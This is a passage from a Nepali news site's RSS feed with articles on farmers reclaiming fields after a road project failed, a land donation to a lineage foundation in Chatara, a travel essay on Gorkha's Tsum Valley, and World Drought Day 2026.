हामीले परम्परागत रुपमा धान खेती गर्दै आएको ठाउँ हो, सडक बन्दा र हामीलाई पनि सुविधा होला भनेर खेत मासेर सडक बनाउन दिएको काम नलागेपछि अब फेरि खेत बनाउनु पर्ने बाध्यता आइलागेको स्थानीय शान्ता मिश्र तथा बविता घिमिरेले बताउनु भयो । उहाँले भन्नुभयो, ‘‘सडक बनाइदेउ भनेर सम्बन्धित निकायमा भन्न जानभन्दा खेत रोप्न जाति भन्ने लाग्यो धान रोप्नेहरूले बताएका छन् ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49712 0
प्राचिन धार्मिक स्थल चतरामा कश्यप अधिकारी वंश प्रतिष्ठानलाई पाँच कठ्ठा जग्गा दान https://www.antaranganews.com/?p=49697 https://www.antaranganews.com/?p=49697#respond Sat, 27 Jun 2026 15:37:59 +0000 https://www.antaranganews.com/?p=49697 चतरा(सुनसरी)– सुनसरी जिल्लाको बराहक्षेत्र नगरापलिका– ३ को प्राचिन धार्मिक स्थल चतरा निवासी दुई जना दानवीर अधिकारी बन्धुहरूले कश्यप गोत्रीय अधिकारी वंश प्रतिष्ठानलाई पाँच कठ्ठा जग्गा गर्नु भएको छ । सोही स्थान निवासी द्वय शिवप्रसाद अधिकारी र छत्रबहादुर अधिकारीले संयुक्त रुपमा उक्त जग्गाको स्वामित्व असार १३ गते हस्तान्तरण गर्नु भएको हो ।
कश्यप गोत्रीय अधिकारी वंश प्रतिष्ठानका केन्द्रीय अध्यक्ष नरेन्द्रकुमार अधिकारीको नेतृत्वमा प्रतिष्ठानको एक टोली चतरा पुगेको थियो । सो टोलीलाई उहाँहरूले सो जग्गा हस्तान्तरण गर्नु भएको हो । सो प्रयोजनका लागि आज चतरा जानु हुनेमा प्रतिष्ठानका उपाध्यक्ष चन्द्रमणि अधिकारी, कोषाध्यक्ष निमेष अधिकारी, दाता शान्तिबहादुरकी आमा, कोशी प्रदेशका अध्यक्ष शान्तिबहादुर अधिकारी, सोही समितिका वरिष्ठ उपाध्यक्ष युवराज अधिकारी, सचिव लिलाबहादुर अधिकारी, सुनसरी शाखाका अध्यक्ष वीरेन्द्र अधिकारीलगायत हुनुहुन्थ्यो ।
प्रतिष्ठानका वरिष्ठल व्यक्तित्वहरूको उपस्थितिमा भएको एक अनौपचारिक कार्यक्रमका बीच उहाँह½रूले उक्त जग्गाको स्वामित्व प्रतिष्ठानलाई हस्तान्तरण गरेको घोषणा गर्नु भएको हो । त्यसको स्वामित्व प्रतिष्ठानका नाउँमा (लालपूर्जा) बनाउनका लागि प्रतिष्ठानको सुनसरी शाखाका अध्यक्ष वीरेन्द्र अधिकारीलाई जिम्मा दिइएको प्रतिष्ठानका केन्द्रीय उपाध्यक्ष चिरञ्जीवी अधिकारीले बताउनु भयो ।
उहाँका अनुसार अब छिट्टै कोशी प्रदेश समिति, सुनसरी, मोरङ र खोटाङ जिल्ला शाखाको संयुक्त समितिको बैठक बसेर त्यो जग्गालाई के कसरी प्रतिष्ठानको हितमा बहुउपयोगी बनाउन सकिन्छ ? भन्ने गुरु योजना बनाउने सहमति भएको छ ।
सो अवसरमा प्रतिष्ठानका केन्द्रीय अध्यक्ष नरेन्द्रकुमार अधिकारीले दाताहरूलाई धन्यवाद दिने क्रममा उदार मनका उहाँहरूको सपरिवार सबैजनलाई धन्यवाद दिदै कुल पितृहरूको सदा आशीर्वाद रहिरहने बताउनु भएको थियो । यस्तै मनकारीदाताहरूले गर्दा नै आज प्रतिष्ठानको शिर उचो भएको छ । यसलाई थप उचा बनाउने उर्जा थपिएको छ भन्नुभयो ।
उक्त अवसरमा दाताहरूद्वय शिवप्रसाद र छत्रबहादुरले उक्त जग्गा प्रतिष्ठानलाई हस्तान्तरण गर्न पाएकोमा आफूहरूलाई गौरवबोध भएको बताउनु भएको थियो । उहाँहरूले उक्त जग्गाको उचित उपायोग हुनेछ भन्ने विश्वास समेत व्यक्त गर्नु भएको छ ।

]]>
https://www.antaranganews.com/?feed=rss2&p=49697 0
 गोरखा जिल्लाको चुम उपत्यका : पर्यटन अहिंसा क्षेत्र र बौद्ध संस्कृति   https://www.antaranganews.com/?p=49649 https://www.antaranganews.com/?p=49649#respond Thu, 25 Jun 2026 14:10:43 +0000 https://www.antaranganews.com/?p=49649 पर्यटनको उद्देश्य नयाँ ठाउँ, नयाँ अनुभव र नयाँ परिवेशको खोजी गर्नु हो । मानिस स्वभावतः आफूले नदेखेको र नभोगेको कुराप्रति आकर्षित हुन्छ । त्यसैले हिमाल नदेखेकालाई हिमाल हेर्ने रहर हुन्छ भने समुद्र नदेखेकालाई समुद्र अवलोकन गर्ने इच्छा हुन्छ । अर्कोतर्फ धेरै पर्यटकहरूलाई प्राकृतिक सौन्दर्यलाई प्रत्यक्ष अनुभव गर्ने जिज्ञासा हुन्छ । त्यसैले पर्यटकहरू पदयात्राका लागि विशेष गरी हिमाली क्षेत्र रोज्ने गर्दछन । विश्व पर्यटन बजारले नेपाललाई हिमाल र ट्रेकिङको देश भनेर चिनाएकाले वाह्य पर्यटकहरू हिमाली क्षेत्रमा पदयात्रा गर्न खोज्दछन ।
गोरखा जिल्लाको मनास्लु क्षेत्रमा नुब्री र चुम उपत्यका पर्दछ । पर्यटकहरूले पदयात्रा गर्ने दुबै उपत्यका तिब्बती बौद्ध संस्कृति, प्राचीन गुम्बा, हिमाली सभ्यता र प्राकृतिक सौन्दर्यका लागि प्रसिद्ध छन । नुब्री उपत्यका मनास्लु हिमालको उत्तरतर्फ पर्दछ । जहाँ सामागाउँ, साम्दो जस्ता गाउँहरू रहेका छन । चुम उपत्यकालाई लुकेको उपत्यका पनि भनिन्छ । गणेश हिमाल र श्रीङ्गी हिमालको बीचमा बग्ने स्यार खोलाले बनाएको छेकम्पार र चुमचेतलाई चुम उपत्यका भन्ने गरिन्छ । चुमचेतलाई तल्लो चुम र छेकम्पारलाई माथिल्लो चुम भनेर पनि चिनिन्छ । चुम उपत्यका प्राचीन ऐतिहासिक पवित्र बौद्ध धर्मको आस्था र उपासना स्थलको रुपमा रहिआएको छ । पर्यटनका लागि हिमाली जीवनशैलीका हिसाबले मनास्लु क्षेत्र अर्गानिक भूगोल हो । चुममा आजभोलि जैविक विविधता र संस्कृति संरक्षण गर्दै पर्या–पर्यटनको विकास भएको छ । एक्यापमा चुम र नुब्री दुवै उपत्यका पर्दछन । हिमाली श्रृंखला, प्राचीन गुम्बा, चैत्य र तिब्बती संस्कृति चुम र नुब्री पर्यटनका लागि दुवै उपत्यका आकर्षण मानिन्छ ।
मनास्लु सर्किट र चुम उपत्यका गरी दुई फरक–फरक पदयात्रा मार्ग यो क्षेत्रका प्रमुख आकर्षण हुन् । एडभेञ्चर र जोखिम मोल्न चाहने पर्यटकहरू मनास्लु सर्किटको यात्रा रोज्छन् भने हिमाली जीवनशैली, बौद्ध परम्परा र सुन्दर हिमाली दृश्यमा रमाउन चाहने पर्यटकहरू चुम उपत्यकाको यात्रा गर्न मन पराउँछन् । केही पदयात्रीले भने चुम उपत्यका र मनास्लु सर्किट दुवैको यात्रा एकैपटक गर्छन् । विशेष गरी मनास्लु क्षेत्रमा पदयात्रा गर्ने वाह्य पर्यटकहरू आरुघाटबाट चुम हुँदै नुब्री घुमेर लार्केपास गरी मनाङ निस्कन्छन । तर धेरै पर्यटकहरू चुम उपत्यका मात्र पुग्ने गर्दछन । कोहि पर्यटकहरू गएकै बाटो चुमबाट फर्कन्छन । वास्तवमा चुम उपत्यका पर्यटनका लागि सुन्दर उपहार हो । जहा बौद्ध दर्शन, प्रकृति, संस्कृति र जैविक विविधताले पर्यटकहरूलाई छुट्टै अनुभूति हुन्छ । चुम उपत्यकामा पाइला टेक्नेबित्तिकै धेरै पर्यटकहरू आश्चर्यचकित हुन्छन । प्राकृतिक सौन्दर्यका कारण मात्र होइन, यहाँका वन्यजन्तु र मानिसबीचको अदभुत सम्बन्धका कारण पनि पर्यटकहरूलाई अनौठो लाग्दछ । सामान्यतया जंगलका जनावरहरू मानिस देख्नेबित्तिकै भाग्छन, तर चुम उपत्यकामा दृश्य फरक छ ।
चुम उपत्यकालाई जीवजन्तुको खुला संग्रहालय भनिन्छ । यहाँका जीव जनावर र चराचुरुंगीको मानिससँग पारिवारिक सम्बन्ध जस्तै छ । चुम क्षेत्रमा झारल, घोरल, कस्तुरी मृग, कालिज, डाँफे तथा मुनाल, लंगुर बाँदर जस्ता जिवजन्तु प्रचुर मात्रामा पाइन्छ । खुला चिडियाखानको रुपमा समेत चिनिएको चुम क्षेत्रमा झारल नाउर कस्तुरी घर वरपर चरिरहेका हुन्छन । मानिससँगै जंगली जनावर पनि खेलिरहेका हुन्छन । चुम क्षेत्रका स्थानीयले दुध, दही, ध्यू, छुर्पीको लागि मात्रै पशुपालन गर्छन । आफूले पालेको पशु अन्य कसैलाई मारकाटको लागि विक्री गर्दैनन । चुम उपत्यकाका प्रमुख गाउँहरूमा तल्लो चुम, लोक्पा, चुम्लिङ, रिछेत, डोम्जे र माथिल्लो चुम, छोखाङ पारो अर्थात छेकम्पार, लार, लामागाउँ, बुर्जी, छुले, निले, राछेन गुम्बा, मु गुम्बा यी गाउँहरूमा तिब्बती बौद्ध संस्कृति, मणिपर्खाल, छोर्तेन र प्राचीन गुम्बाहरू धेरै छन । यी गाउँहरूमा पर्यटकहरू पुक्दा छक्क पर्दछन । करिब ८ सय घरधुरी रहेको चुम उपत्यकामा कुनै पनि जीव जनावर काटमार गर्न पाइदैन । शिकार खेल्न मह काड्ने र वनमा डढेलो लगाउन पाइदैन । चुम घुम्न जाने पर्यटकहरूले पनि मासु खान पाउँदैनन । किनभने होटलहरू सबै शाकाहारी मात्रै हुन्छन ।
चुम उपत्यकाको पदमार्ग वरिपरि नाउर, मृग, घोरल, हिमाली चराचुरुङ्गी तथा अन्य वन्यजन्तुहरुरू सहज रुपमा देखिन्छन । जनावरहरू पर्यटकहरूबाट त्रसित हुँदैनन, बरु आफ्नै संसारमा रमाइरहेका हुन्छन । यस्तो दृश्य देख्दा पर्यटकहरू क्यामेरा निकालेर फोटो खिच्न थाल्छन, भिडियो बनाउँछन र यो दुर्लभ अनुभवलाई स्मृतिमा कैद गर्न खोज्छन । यसको मूल कारण चुम उपत्यकाको प्राचीन अहिंसात्मक जीवनदर्शन हो । बौद्ध धर्म र करुणाको गहिरो प्रभाव रहेको चुम क्षेत्रमा जीवहत्या निषेध मानिन्छ । यहाँका स्थानीय समुदायले शताब्दीयौँदेखि सबै प्राणीलाई जीवनको समान अधिकार भएको ठान्दै आएका छन । यही कारण चुम उपत्यकालाई अहिंसा क्षेत्र भनेर चिनिन्छ । चुम उपत्यकामा जनावर र मानिसबीचको सम्बन्ध केवल सहअस्तित्वको मात्र होइन, विश्वासको पनि प्रतीक बनेको छ । यहाँको वातावरणले प्रकृति र मानवबीचको सामञ्जस्य कस्तो हुन सक्छ भन्ने जीवन्त उदाहरण प्रस्तुत गर्छ । नाउरको झुण्ड पदमार्ग नजिकै चरिरहेको देख्दा वा मृगहरू निर्धक्क हिंडिरहेको दृश्य अवलोकन गर्दा लाग्छ, मानौँ उनीहरु पनि आगन्तुकहरूको स्वागत गरिरहेका छन ।
 आजको संसारमा वन्यजन्तु र मानवबीचको द्वन्द्व बढदै गइरहेका बेला चुम उपत्यकाले करुणा, संरक्षण र सहअस्तित्वको सन्देश दिन्छ । चुम पुग्ने पर्यटकहरूले केवल हिमाल, गुम्बा र संस्कृति मात्र देख्दैनन, उनीहरूले एउटा यस्तो समाजको अनुभव गर्छन, जहाँ अहिंसाको भावना मानव सीमाभन्दा बाहिर फैलिएको छ र सम्पूर्ण जीवजगतलाई अँगालेको छ । त्यसैले चुम उपत्यका पर्यटनका लागि प्राकृतिक सौन्दर्यको अवलोकन मात्र होइन, प्रकृतिसँगको आत्मीय सम्बन्ध र अहिंसाको जीवित दर्शनसँगको साक्षात्कार पनि हुन्छ । चुम अहिंसा क्षेत्र घोषणा भएको १ सय ६ वर्ष भएको छ । पर्यटकहरूले चुम उपत्यकामा बौद्ध धर्म फैलाउने तान्त्रिक गुरु पदमसंभवले ध्यान, योग र साधना गरेको पवित्र भूमिका बारेमा सोधखोज गर्दछन । चुम उपत्यकामा पर्यटकलाई शान्त, स्वच्छ र प्रदूषणरहित वातावरणको अनुभव छुट्टै हुन्छ । अर्कोतर्फ स्थानीय संस्कृति, परम्परा, भाषा र जीवनशैलीसँग परिचित हुने मौका पनि हुन्छ । चुमको यात्रामा साहसिक अनुभव प्राप्त गर्दै शारीरिक तथा मानसिक तन्दुरुस्ती बढाउने पनि हुन्छ । हिमश्रृखला, सूर्योदय–सूर्यास्त तथा दुर्लभ वनस्पति र वन्यजन्तु अवलोकन गर्ने अवसर पनि हुन्छ । यसैले प्राकृतिक सौन्दर्य, साहसिकता, सांस्कृतिक विविधता र आत्मिक शान्तिको खोजीले पर्यटकहरूलाई हिमाली क्षेत्रमा पदयात्रातर्फ आकर्षित गर्दछ ।
चुम उपत्यका विशिष्ट सांस्कृतिक तथा धार्मिक पर्यटन र बौद्ध संस्कृतिको जीवित संग्रहालय हो । चुम उपत्यकाका बासिन्दाले आज पनि शताब्दीयौँ पुराना भाषा, भेषभूषा, संस्कृति, धार्मिक परम्परा र अहिंसाको जीवनशैलीलाई संरक्षण गरेका छन । चुम उपत्यकामा रहेका प्राचीन गुम्बा, मणी पर्खाल, छोर्तेन, प्रार्थना झण्डा तथा ध्यानस्थलहरूले यस क्षेत्रलाई आध्यात्मिक पर्यटनको महत्वपूर्ण केन्द्र बनाएको छ । विशेष गरी मु गुम्बा र राछेन गुम्बा बौद्ध धर्मावलम्बीहरूका लागि पवित्र तीर्थस्थल मानिन्छन । स्थानीय समुदायको जीवनशैली, धार्मिक आस्था र सांस्कृतिक सम्पदा आजसम्म जीवित रहेकाले चुम उपत्यका पुगेका पर्यटकहरूले वास्तविक हिमाली बौद्ध सभ्यताको अनुभव गर्न सक्छन । गणेश हिमाल, श्रीङ्गी हिमाल र बौद्ध हिमालको मनोरम दृश्यले सजिएको चुम उपत्यका पर्यटनका लागि प्राकृतिक सौन्दर्य, आध्यात्मिक शान्ति र सांस्कृतिक सम्पदाको अनुपम संगम हो । चुम क्षेत्रमा रहेको मु गुम्बा, राचेन आनी गुम्बा, मिलारेपा गुफा, छेसोङ ताल लगायत अन्य गुम्बाहरूले चुम उपत्यका पर्यटनका लागि अविस्मरणीय यात्राको महसुस हुन्छ । पदयात्राको क्रममा बौद्ध, संस्कृति, कला, रहनसहन, दैनिकी जिबन यापन र स्थानिय खानपिनको अनुभवको मज्जा छुट्टै हुन्छ । पर्यटकलाई गाउँघरमै उब्जाइएका जैविक आलु फापर, मकै, कोदो, भटमास, रायोको साग, चौरीको दुध, दही, छुर्पी लगायत परिकार खुवाउने गर्छन ।
चुम उपत्यकाको सामाजिक र सांस्कृतिक सम्बन्ध शताब्दीयौँदेखि तिब्बतसँग जोडिएको छ  । चुममा पुग्ने पर्यटकहरुले बहुपति प्रथा सुन्दा अचम्म मान्दछन । वहुपति प्रथामा एक महिलाले एउटै परिवारका दुई वा बढी दाजुभाइसँग विवाह गर्ने चलन हुन्छ । हिमाली क्षेत्रमा सीमित खेतीयोग्य जमिन, कठोर जीवनयापन र पारिवारिक सम्पत्ति टुक्रिन नदिन यस्तो प्रथा विकसित भएको मानिन्छ । चुम उपत्यकामा यो प्रथा अहिले नयाँ पुस्तामा प्रायः देखिँदैन । तर पनि चुम उपत्यकाको संस्कृति अध्ययन गर्ने पर्यटकहरूका लागि वहुपति प्रथा चासो र अनुसन्धानको विषय बन्दछ । चुममा महायान बौद्ध धर्मको प्रभाव भए पनि यो प्रथा धार्मिक आदेश भने होइन । बौद्ध धर्मले यसलाई न अनिवार्य गरेको छ, न निषेध । यो मुख्यतः हिमाली भूगोल, सीमित जमिन र सानो उत्पादनमा स्रोत जोगाउने सामाजिक रणनीति प्रथा मानिन्छ ।
मनास्लु पदमार्गमा स्यार खोला र बुढीगण्डकी मिसिने ठाउँलाई न्याक अर्थात न्याक पेडी पनि भनिन्छ । यही दोभानबाट स्यार खोला उपत्यका हुँदै चुम उपत्यकाको पदयात्रा सुरु हुन्छ । बुढीगण्डकी मनास्लुको उत्तरतर्फका हिमनदीबाट निस्केर गहिरा गल्छी चिर्दै दक्षिण बग्छ भने स्यार खोला गणेश हिमाल र हिमचुलीबाट उदगम भएर निले, छुले, छेकम्पार, चुम्लिङ हुँदै न्याकमा आएर बुढीगण्डकीमा मिसिन्छ । न्याकबाट चुम जाने स्वागत गेटबाट अगाडी लाग्ना साथ घना जंगल, झोलुंगे पुल पार गर्दै शेर्पा गाउँ चुम्लिङ पुगिन्छ । छेकम्पार चुमको सबैभन्दा ठूलो गाउँ हो । जहाँ पर्यटकहरुका लागि होटल, लजहरु छन । छेकम्पार देखि पर्यटकहरूलाई ढुंगाले बनेका घर, गुम्बा, माने र छोर्तेनले  वास्तविक चुमको अनुभव दिन्छ । यही बाटो हुँदै तिब्बतको ताप्ले नाका पनि पुग्न सकिन्छ । त्यसैले छेकम्पारमा सीमा प्रहरी चौकी पनि छ ।
मनास्लुको पछाडि सामागाउँ, साम्दो लगायत एक दर्जन गाउँ छन् । पूर्वतर्फ रहेको बौद्ध हिमालको पछाडि भने चुम उपत्यका पर्दछ । नेपालको नक्सा हेर्दा गोरखा जिल्लाको उत्तरी भागमा तिब्बततिर धकेलिएको भाग देख्नुहुनेछ । त्यहीँ पर्छ चुम उपत्यका । छेकम्पार, निले, चुले लगायत एक दर्जन गाउँ रहेको चुम रहस्यले भरिएको हिमाली उपत्यका हो । कल्पना गर्नुस त यी हिमाली गाउँ घुम्नुको मज्जा, यहाँका गुम्बा, स्तुप, र्छोर्तेन, माने वरिपरि घुम्न पाउदा पर्यटकहरु को अनुभव शब्दमा बर्णन गर्न सकिन्न । जीवनमा थोरै मानिसले मात्र यो आनन्द महसुस गर्न पाउँछन् । प्रकृति र बौद्ध परम्पराले अदभूत सजिएको चुममा केही वर्ष यता विदेशी पर्यटकहरू पुग्न थालेका छन । पदयात्रामा रमाउन खोज्ने पर्यटकहरुलाई मनास्लुको वास्तविक हिमाली, तिब्बती संस्कृति को अनुभव माथिल्लो क्षेत्रमा हुन्छ । तर मनास्लु पदमार्ग अब पूर्ण रुपमा पदमार्ग मात्र रहेन । सडक र पदयात्रा सहअस्तित्वमा रहेको मिश्रित मार्ग बनेको छ । तर नामरुङ माथिको भूभागले अझै पनि पुरानो मनास्लुको पदमार्ग जोगाएको छ । नामरुङ, ल्हो, श्याला, सामागाउँ र साम्दोतिर पुगेपछि भने सडकको प्रभाव निकै कम देखिन्छ ।
मनास्लु पदमार्गको पछिल्लो अवस्था सडक विस्तारले परिवर्तन ल्याएको छ । अहिले जिपहरू माछाखोला– जगत हुँदै पाङसिङ र फिलिम नजिकसम्म पुग्ने गर्दछन । काठमाडौं– आरुघाट– सोतीखोला–माछाखोला नियमित बस सञ्चालनमा छ । पहिले आरुघाट वा सोतीखोलादेखि सुरु हुने पदयात्रा अहिले धेरैले फिलिम वा त्यस वरपरबाट सुरु गर्न थालेका छन । यसले २– ३ दिनको पदयात्रा घटाएको छ । तर   तल्लो भेगको पदमार्गमा सडक निर्माणका कारण धुलो, गाडीको आवाजले पदयात्राको मौलिक अनुभव प्रभावित भएको छ । निर्माणाधिन बुढीगण्डकी करिडोरको बेनीघाट– आरुघाट– लार्केभञ्ज्याङ सडकका दूरी करिब १५४ कि.मि. रहेको छ । लार्केभञ्ज्याङ– रुइला सीमा करिब ८–१० कि.मि.रहेको छ । तर अहिले पनि माथिल्लो भेग फिलिम–साम्दो–लार्के सडक खण्ड निर्माण को चरणमा छ ।
चुम उपत्यका पुग्ने पर्यटकहरू हिमाल मात्र हेरेर फर्किँदैनन । पर्यटकहरूले पृथक सभ्यता, जीवनदर्शन र हिमाली संस्कृतिसँग साक्षात्कार गरेर फर्कन्छन । चुम उपत्यकामा पाइला टेक्नासाथ गणेश हिमाल, हिमचुली, बौद्ध हिमाल र तिब्बती हिमश्रृंखलाका मनोरम दृश्यले पर्यटकलाई मन्त्रमुग्ध बनाउँछ । हिउँले ढाकिएका शिखरहरू, नीलो आकाश र हरिया घाँसे मैदान र मानवबस्तीमा चर्न आउने जंगली जनावरले पर्यटकहरूलाई नयाँ अनुभव हुन्छ । चुममा पर्यटकहरुले जीवित तिब्बती बौद्ध संस्कृति, मानिसहरूको भाषा, भेषभूषा, घर निर्माणको शैली, धार्मिक परम्परा र दैनिक जीवनमा तिब्बती बौद्ध संस्कृतिको गहिरो प्रभाव देख्दछन । जुन कारणले पर्यटकहरुलाई चुम क्षेत्र खुल्ला सांस्कृतिक संग्रहालयजस्तै लाग्छ । तिब्बती बौद्ध धर्मका महान योगी मिलारेपा सँग सम्बन्धित गुफा चुम उपत्यकाको अर्को आकर्षण हो । चुम उपत्यकामा पुग्दा पर्यटकहरूले ऐतिहासिक स्थल मात्र होइन, तपस्या, ध्यान र आत्मिक साधनाको कथा पनि अनुभव गर्छन । चुम उपत्यका अहिंसा र करुणाको बौद्ध दर्शनबाट प्रभावित क्षेत्र हो । यहाँको सामाजिक सदभाव, सरल जीवनशैली र आपसी विश्वासले बाहिरी संसारको व्यस्त जीवनबाट आएका पर्यटकलाई आश्चर्य लाग्दछ ।
पर्यटकहरूलाई जानकारी दिन पदमार्गमा सूचना बोर्ड राखिएको छ । यामगाउँ, काशीगाउँ, धार्चे डाँडा, माछाखोला र यारुबगरमा राखिएका बोर्डले पर्यटकीय स्थलको उचाइ, गन्तव्य पुग्न लाग्ने समय, एक ठाउँदेखि अर्को ठाउँसम्मको दूरीलगायत जानकारी दिन्छन । बोर्डमा पदमार्गमा पर्ने खोलानाला, ताल, पुलका साथै ती क्षेत्रमा पाइने वन्यजन्तुबारे पनि जानकारी दिइएको छ । हिमालय क्षेत्रको पदयात्राका क्षणहरु अविस्मरणीय हुन्छन । नयाँ ठाउँमा यात्रा गर्न जति रमाइलो र मनोरम हुन्छ, त्यति नै कठिन पनि हुन्छ । यात्रालाई सहज बनाउन पर्यटकले आफ्नो स्वास्थ्य स्थितिको ख्याल राख्नुपर्छ । गन्तव्यबारे पूर्वजानकारी लिएर मात्र यात्रामा निस्कदा राम्रो हुन्छ । वातावरण तथा मौसम सुहाउँदो लुगा, अत्यावश्यक सामग्री र प्राथमिक उपचारका सामग्रीहरू साथमै राख्नुपर्छ । मोबाइल फोन लिँदा यात्रामा सजिलो हुन्छ । सकेसम्म यस्तो पदयात्रामा एक्लै नगई साथी वा गाइडको साथमा जानुपर्छ ।
कसरी पुग्ने चुम उपत्यका ?
चुमनुब्री उपत्यका गोरखाको आरुघाट र मनाङको धारापानी हुँदै लार्के पास गरेर पनि जान सकिन्छ । मनास्लु क्षेत्र अर्थात चुमनुब्रीमा जाने मुख्य बाटो गोरखाको आरुघाट बजार हो । आरुघाट जान पृथ्वीराजमार्गको बेनीघाटबाट बसमा यात्रा गर्न सकिन्छ । आरुघाट धादिङबेसीबाट समेत मोटरमार्गले जोडिएको छ । पोखराबाट मध्यपहाडी लोकमार्ग हुँदै आउने पर्यटकका लागि पनि सडकले आरुघाट जोडछ । आरुघाटदेखि सोतीखोला, लापुवेसी, माछाखोला हुँदै यात्रा गर्नुपर्छ । अर्को रुट बारपाकबाट लाप्राक हुँदै सिंग्ला निस्किएर माछाखोला पुग्ने पदमार्ग पनि छ । धादिङको फूलखर्क हुँदै गोरखाको केरौंजा, यार्साबाट माछाखोला पुग्ने पदमार्ग पनि पर्यटकले प्रयोग गर्न सक्छन ।
(लेखक : लामो समयदेखि पत्रकारितामा सक्रीय रहनु भएका उहाँ लमजुङ जन्म थलो भई दाङलाई कर्मथलोका रुपमा रोज्नु भई नेपालको पर्यटनका बारेमा विशेष दखल राख्दै कलम चलाउने गर्नु हुन्छ । – सं.)
]]>
https://www.antaranganews.com/?feed=rss2&p=49649 0
आज विश्व खडेरी विरुद्ध दिवस : विविध कार्यक्रमका साथ मनाइदै https://www.antaranganews.com/?p=49414 https://www.antaranganews.com/?p=49414#respond Wed, 17 Jun 2026 02:49:27 +0000 https://www.antaranganews.com/?p=49414 काठमाडौं– आज असार ३ गते विश्व खडेरी दिवस । हरेक वर्ष जुन १७ तारिखका दिन विश्वभर यो दिवस विविध कार्यक्रमका साथ मनाउने गरिन्छ । बढ्दो मरुभूमीकरण र खडेरीविरुद्ध विश्व समूदायमा जनचेतना फैलाउन र ऐक्यवद्धता कायम गर्न सन् १९९५ देखि यो दिवस मनाउने गरिएको हो ।
२०२६ को विश्व खडेरीविरुद्ध संघर्षको दिवसको विषयवस्तु ‘चरन क्षेत्रस् पहिचान गरौँ, सम्मान गरौँ, पुनःस्थापना गरौँ ।’ भन्ने रहेको छ । बढ्दो मरुभूमिकरण र खडेरी विरुद्ध विश्व समुदायमै जनचेतना बढाउन र ऐक्यवद्धता कायम गर्नका लागि सन् १९९५ देखि हरेक वर्ष विश्व समुदायले यो दिवस मनाउँदै आएको छ ।
प्रविधिले विकासमा ठूला ठूला फड्को मार्न सकेको भएता पनि मानिसका मनमा दया, माया, करुणको वीज उमार्न नसके जस्तै अर्थात ठूला ठूला मेसिनरी वस्तु हवाईजहाज, कम्प्युटरलगायतका मेशिन बनाउन सक्ने प्रयोगशालाद्वारा आजका दिनसम्म एक चिम्टी माटो आफैले बनाउन सकेको छैन । सादय त्यसैले हामीले माटो बनाउने कारखाना सुन्न, जान्न पाएका छैनौं । विश्वमा सबैभन्दा दुर्लभ र प्राण धान्ने वस्तुहरू भनेका नै माटो, पानी, आकाश, अग्नि र हावा नै हुन् । पञ्च तत्त्वका रूपमा वैदिक सनातन संस्कार, संस्कृतिले यी वस्तुहरूको संरक्षणका लागि आव्हान गरेको छ ।
जमिनको खण्डीकरण र मानवीय व्यवहारका कारण जलवायु परिवर्तनलाई सहयोग पुगेको छ । त्यसको असर प्रकृतिक सम्पदा तथा मानव समुदायमा पर्न थालेको छ । खडेरीलाई प्राकृतिक असरका रुपमा पनि व्याख्या गर्ने गरिएको छ । स्थानीय मौसममा फेरबदल हुँदा भूमिको उत्पादक क्षमता घटेर उर्वर भूमि क्रमशः अनुत्पादक हुन थालेका छन् ।
यो दिवसले खाद्य सुरक्षादेखि वातावरण तथा भू–संरक्षण लगायत विभिन्न मुद्दामा विश्व समुदायमाझ निरन्तर सन्देश प्रवाह गर्दै आएको छ । दिवस मनाउनुको मूल उद्देश्य यो धर्तीलाई जीवित वनस्पति र प्राणी जगतको संरक्षणबाट मानव जगतका लागि बस्न योग्य र सुन्दर बनाउनु हो । तर सुक्खा खडेरीका कारण जमिन मरुभूमिकरण हुने खतरा बढ्दै गएको छ । मरुभूमिकरण तथा खडेरी भनेको वर्षात् नहुनु मात्र होइन जलवायु परिवर्तनको असर र मानव क्रियाकलापबाट जमिनको उर्वरा शक्तिमा ह्रास आउनु पनि हो । उत्पादनशील जमिन क्रमशः अनुत्पादक बन्दै जाने प्रक्रिया नै मरुभूमिकरणको अवस्था हो ।
खडेरी भनेको लामो समयसम्म पर्याप्त वर्षा नपर्नु हो । यद्यपि खडेरी एक स्वाभाविक प्रक्रिया हो, जलवायु परिवर्तनले यसको आवृत्ति, अवधि र तीव्रता बढाइरहेको छ। यसले मरुभूमिकरणको असरलाई अझ गम्भीर बनाउँछ, जसले बाली सुकाउँछ, गाईवस्तु र वनस्पतिलाई मार्छ, र पानीको चरम अभाव निम्त्याउँछ ।
मरुभूमिकरण भन्नाले मरुभूमिको विस्तारलाई जनाउने होइन; यसको अर्थ हो उत्पादन क्षमतायुक्त जमिनको गुणस्तर क्रमशः बिग्रनु, यो वन फडानी, अत्यधिक चरन, अस्थिर कृषि अभ्यास, जलवायु परिवर्तन र प्रभावकारी पानी व्यवस्थापनको कमजोरीका कारण हुन्छ । यसले जमिनलाई बिस्तारै बन्जर बनाउँछ, जसले बाली, वनस्पति र जीवन धान्न सक्दैन । जब माटोको माथिल्लो तह बगेर वा सुक्खा भएर जान्छ, सम्पूर्ण पारिस्थितिक तन्त्र कमजोर हुन्छ र समुदायहरू आफ्नै भूमिबाट विस्थापित हुन बाध्य हुन्छन् ।
खडेरी र जमिन क्षरण रोक्न सबै तहको सहकार्य आवश्यक पर्छ । दिगो भूमिसंरक्षण कार्य गर्ने, वनरोपण र वनसंरक्षण, पानी व्यवस्थापनले खडेरीको असर कम गर्न मद्दत गर्दछ ।
जमिन केवल किसान वा वातावरणकर्मीको मात्र विषय होइन । शहर, पहाड, जङ्गल वा तट क्षेत्र जहाँ भए पनि, हाम्रो जीवन स्वस्थ जमिन, शुद्ध पानी र सन्तुलित पारिस्थितिकी प्रणालीमा निर्भर गर्छ ।
विश्व खडेरी रोकथाम दिवसले हामीलाई सोच्न मात्र होइन, काम गर्न पनि प्रेरित गर्छ । यो हामीले आजका दिनमा भोगिरहेको समस्या हो । यदि हामी सबैले हातेमालो गर्यौं भने जमिनको पुनःस्थापना सम्भव छ र भावी पुस्ताका लागि सुरक्षित वातावरण निर्माण गर्न सकिन्छ ।
संयुक्त राष्ट्रसंघीय मरुभूमिकरणविरुद्धको सन्धि (ग्ल्ऋऋम्) अनुसार, विश्वका १०० भन्दा बढी देशहरू गम्भीर जमिन क्षरणको सामना गरिरहेका छन् । ३.२ अर्बभन्दा बढी मानिसहरू यसबाट प्रभावित छन् र यो संख्या अझै बढ्दो छ । विश्वको करिब ४० प्रतिशत जमिन पहिले नै बिग्रिसकेको छ, जसले खाद्य प्रणाली, अर्थतन्त्र र जनसंख्या प्रवाहमा असर पारिरहेको छ ।
यदि अहिलेको प्रवृत्ति यस्तै रह्यो भने सन् २०५० सम्ममा थप ५ करोड मानिस मरुभूमिकरणका कारण विस्थापित हुन सक्ने अनुमान गरिएको छ ।
